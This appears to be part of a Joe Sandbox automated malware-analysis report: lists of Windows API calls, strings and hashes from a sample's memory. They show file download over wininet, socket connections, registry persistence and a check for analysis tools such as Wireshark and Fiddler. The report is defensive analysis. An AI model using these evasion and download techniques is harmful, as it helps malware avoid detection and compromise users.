                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$_wcsrchrlstrcat$EnvironmentExpandStringslstrlenwsprintf
                                                                                                                                                                      • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryW.KERNEL32(wininet.dll), ref: 03777CC3
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03777CD7
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 03777CF7
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 03777D16
                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 03777D53
                                                                                                                                                                      • _memset.LIBCMT ref: 03777D7E
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 03777D8C
                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03777DDB
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03777DF9
                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 03777E01
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 03777E0D
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 03777E28
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite_memset
                                                                                                                                                                      • String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0377455A
                                                                                                                                                                      • timeGetTime.WINMM ref: 0377457B
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0377459B
                                                                                                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 037745BD
                                                                                                                                                                      • SwitchToThread.KERNEL32 ref: 037745D7
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 03774620
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03774644
                                                                                                                                                                      • send.WS2_32(?,037949C0,00000010,00000000), ref: 03774668
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 03774686
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 03774691
                                                                                                                                                                      • WSACloseEvent.WS2_32(?), ref: 0377469F
                                                                                                                                                                      • shutdown.WS2_32(?,00000001), ref: 037746B3
                                                                                                                                                                      • closesocket.WS2_32(?), ref: 037746BD
                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 037746F6
                                                                                                                                                                      • SetLastError.KERNEL32(000005B4), ref: 0377470A
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0377472B
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 03774743
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1692523546-0
                                                                                                                                                                      • Opcode ID: 53707ec190d45f1388a87b06851ba7b4a4df0cbf8f6b3fa18f06454e56d1488e
                                                                                                                                                                      • Instruction ID: 68b15f8ce4cd3e0ce3fc29f7ea784f78f45ff918debd4465f8c3b21659cb7d05
                                                                                                                                                                      • Opcode Fuzzy Hash: 53707ec190d45f1388a87b06851ba7b4a4df0cbf8f6b3fa18f06454e56d1488e
                                                                                                                                                                      • Instruction Fuzzy Hash: 7891AC74200716EBCB24EF26D888BAAF7A9FF48705F148629E516CB645C735F891CBD0
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$swprintf$_malloc
                                                                                                                                                                      • String ID: %s %s$onlyloadinmyself$plugmark
                                                                                                                                                                      • API String ID: 1873853019-591889663
                                                                                                                                                                      • Opcode ID: b576ad3f864d768b2298ff5b89c46459b0d70e0ad4e67acc6d9db015cb8cd704
                                                                                                                                                                      • Instruction ID: a7d5a396f52b5e18ed62feda74934973fc3f4dc2353a442cbb77e89af2c5e587
                                                                                                                                                                      • Opcode Fuzzy Hash: b576ad3f864d768b2298ff5b89c46459b0d70e0ad4e67acc6d9db015cb8cd704
                                                                                                                                                                      • Instruction Fuzzy Hash: F98194B5A40300ABFB10EF24DC8AF6B77A4AF45710F194169ED195F383E671E91187E2
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 03775CD3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: VisibleWindow
                                                                                                                                                                      • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                                                                                                                                                                      • API String ID: 1208467747-3439171801
                                                                                                                                                                      • Opcode ID: 06e85be644a968c945f107108c1411a139fa1d78e23dfd32fc153077bed7aa78
                                                                                                                                                                      • Instruction ID: a15e3967690bec76464b64a12cc79372e4fdabf9465e42d2f3bbb6bb088a28b8
                                                                                                                                                                      • Opcode Fuzzy Hash: 06e85be644a968c945f107108c1411a139fa1d78e23dfd32fc153077bed7aa78
                                                                                                                                                                      • Instruction Fuzzy Hash: 784124F6E91B657AEE62F7317D06FAF214C0D235BAF080166EC18EC105F689921941FE
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 02C6455A
                                                                                                                                                                      • timeGetTime.WINMM ref: 02C6457B
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C6459B
                                                                                                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C645BD
                                                                                                                                                                      • SwitchToThread.KERNEL32 ref: 02C645D7
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 02C64620
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 02C64644
                                                                                                                                                                      • send.WS2_32(?,02C77440,00000010,00000000), ref: 02C64668
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 02C64686
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02C64691
                                                                                                                                                                      • WSACloseEvent.WS2_32(?), ref: 02C6469F
                                                                                                                                                                      • shutdown.WS2_32(?,00000001), ref: 02C646B3
                                                                                                                                                                      • closesocket.WS2_32(?), ref: 02C646BD
                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 02C646F6
                                                                                                                                                                      • SetLastError.KERNEL32(000005B4), ref: 02C6470A
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C7FA44
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EventThread$CloseCurrentErrorExchangeInterlockedLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3448239111-0
                                                                                                                                                                      • Opcode ID: 63e0d30c84d33aba5debb0641fc947cdd55c64083497316c40577f980ced6887
                                                                                                                                                                      • Instruction ID: c06b98738fe6ee3ebef64bd1fb84b385cad3fce75315d6ec88ef6405c69ec9ab
                                                                                                                                                                      • Opcode Fuzzy Hash: 63e0d30c84d33aba5debb0641fc947cdd55c64083497316c40577f980ced6887
                                                                                                                                                                      • Instruction Fuzzy Hash: DF51CE71A40616ABC738DF64D8CCBB9B7A5FF84745F404625E90587A80C770E6A5CBD0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000000D,?,?,?,?,?,?,0377A8C1,?,?), ref: 0377DA43
                                                                                                                                                                      • SetLastError.KERNEL32(000000C1,?,?,?,?,?,?,0377A8C1,?,?), ref: 0377DA62
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                      • Opcode ID: 57346d074488df0db12a513d2844d98e0779bb7040f5d58b2f47b92d9912f510
                                                                                                                                                                      • Instruction ID: 6798e6fbfe37bdf6b75ccc3334f3d73b641c29afd45d09d055bdd23145c680cd
                                                                                                                                                                      • Opcode Fuzzy Hash: 57346d074488df0db12a513d2844d98e0779bb7040f5d58b2f47b92d9912f510
                                                                                                                                                                      • Instruction Fuzzy Hash: 2881D271701205AFDB30EFA9D884B6AB7E4FF48315F194669E909DB641E771E801CBD0
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 0377C63D
                                                                                                                                                                      • _memset.LIBCMT ref: 0377C64C
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000), ref: 0377C66F
                                                                                                                                                                        • Part of subcall function 0377C81E: RegCloseKey.ADVAPI32(80000000,0377C7FA), ref: 0377C82B
                                                                                                                                                                        • Part of subcall function 0377C81E: RegCloseKey.ADVAPI32(00000000), ref: 0377C834
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close_memset$Open
                                                                                                                                                                      • String ID: %08X
                                                                                                                                                                      • API String ID: 4292648718-3773563069
                                                                                                                                                                      • Opcode ID: da8256d84bdb814bfae18285a6e5158c2fc4f13ed0cd789c674d3174476ba024
                                                                                                                                                                      • Instruction ID: fe29fa791662726fc4e01757f8325b8a73529e4b63d672701c1434292aa4003e
                                                                                                                                                                      • Opcode Fuzzy Hash: da8256d84bdb814bfae18285a6e5158c2fc4f13ed0cd789c674d3174476ba024
                                                                                                                                                                      • Instruction Fuzzy Hash: FC5133F2A40219BBDB25EF50DC85FEA7778EB48704F40469DF705AA180DB74AB44CB94
                                                                                                                                                                      APIs
                                                                                                                                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 03773710
                                                                                                                                                                      • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 03773749
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 03773766
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 03773779
                                                                                                                                                                      • WSACreateEvent.WS2_32 ref: 0377377B
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,037A1F0C), ref: 0377378D
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,037A1F0C), ref: 03773799
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,037A1F0C), ref: 037737B8
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,037A1F0C), ref: 037737C4
                                                                                                                                                                      • gethostbyname.WS2_32(00000000), ref: 037737D2
                                                                                                                                                                      • htons.WS2_32(?), ref: 037737F8
                                                                                                                                                                      • WSAEventSelect.WS2_32(?,?,00000030), ref: 03773816
                                                                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 0377382B
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,037A1F0C), ref: 0377383A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1455939504-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 02C63710
                                                                                                                                                                      • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 02C63749
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 02C63766
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 02C63779
                                                                                                                                                                      • WSACreateEvent.WS2_32 ref: 02C6377B
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,02C7D990), ref: 02C6378D
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,02C7D990), ref: 02C63799
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,02C7D990), ref: 02C637B8
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,02C7D990), ref: 02C637C4
                                                                                                                                                                      • gethostbyname.WS2_32(00000000), ref: 02C637D2
                                                                                                                                                                      • htons.WS2_32(?), ref: 02C637F8
                                                                                                                                                                      • WSAEventSelect.WS2_32(?,?,00000030), ref: 02C63816
                                                                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 02C6382B
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,02C7D990), ref: 02C6383A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1455939504-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLocalTime.KERNEL32(?,A0516FA3), ref: 0377AA58
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377AA8F
                                                                                                                                                                      • _memset.LIBCMT ref: 0377AAA7
                                                                                                                                                                      • _memset.LIBCMT ref: 0377AABA
                                                                                                                                                                        • Part of subcall function 03778020: lstrlenW.KERNEL32(?), ref: 03778038
                                                                                                                                                                        • Part of subcall function 03778020: _memset.LIBCMT ref: 03778042
                                                                                                                                                                        • Part of subcall function 03778020: lstrlenW.KERNEL32(?), ref: 0377804B
                                                                                                                                                                        • Part of subcall function 03778020: lstrlenW.KERNEL32(?), ref: 03778056
                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0377ABBE
                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?), ref: 0377AC6E
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0377ACAA
                                                                                                                                                                        • Part of subcall function 0377F707: _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                        • Part of subcall function 03779730: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,A0516FA3,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E,00000000), ref: 03779773
                                                                                                                                                                        • Part of subcall function 03779730: InitializeCriticalSectionAndSpinCount.KERNEL32(0377E1AE,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 03779812
                                                                                                                                                                        • Part of subcall function 03779730: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 03779850
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateEvent_memsetlstrlen$CloseCountCriticalHandleInitializeLocalSectionSleepSpinTime_mallocwsprintf
                                                                                                                                                                      • String ID: %4d.%2d.%2d-%2d:%2d:%2d$o1:$p1:$t1:
                                                                                                                                                                      • API String ID: 1254190970-1225219777
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,AppEvents,00000000,00000002,?), ref: 0377C889
                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(?), ref: 0377C894
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0377C8A4
                                                                                                                                                                      • RegCreateKeyW.ADVAPI32(80000001,AppEvents,?), ref: 0377C8C3
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0377C8D1
                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 0377C8E4
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 0377C8F2
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0377C900
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close$Value$CreateDeleteOpenlstrlen
                                                                                                                                                                      • String ID: AppEvents$Network
                                                                                                                                                                      • API String ID: 3935456190-3733486940
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$swprintf$_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1873853019-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,DFA3C3C3), ref: 02C65A65
                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02C65B04
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C65B42
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C65B67
                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02C65C5F
                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02C65C80
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C65B8C
                                                                                                                                                                        • Part of subcall function 02C61280: __CxxThrowException@8.LIBCMT ref: 02C61290
                                                                                                                                                                        • Part of subcall function 02C61280: DeleteCriticalSection.KERNEL32(00000000,?,02C77E78), ref: 02C612A1
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02C65CF1
                                                                                                                                                                      • timeGetTime.WINMM ref: 02C65CF7
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C65D0B
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C65D14
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1400036169-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,A0516FA3,?,?,?,?,00000000,000000FF,00000000), ref: 03774CE6
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,A0516FA3,?,?,?,?,00000000,000000FF,00000000), ref: 03774D0D
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 03774D21
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 03774D28
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2124651672-0
                                                                                                                                                                      • Opcode ID: 5bc85c70708e74985413b96e83c445220a6eef762ce3560c4740f18d0d7a8f95
                                                                                                                                                                      • Instruction ID: 8b6812583d372d77f16137d4cee7af647021726d696c5c2333037334d879f1af
                                                                                                                                                                      • Opcode Fuzzy Hash: 5bc85c70708e74985413b96e83c445220a6eef762ce3560c4740f18d0d7a8f95
                                                                                                                                                                      • Instruction Fuzzy Hash: F851C176A04708DFCB24EFA9E884A6AF7F4FB48710F058A6EE91AD7741D735A400CB51
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,DFA3C3C3,?,?,?,?,00000000,000000FF,00000000), ref: 02C64CC6
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,DFA3C3C3,?,?,?,?,00000000,000000FF,00000000), ref: 02C64CED
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 02C64D01
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 02C64D08
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
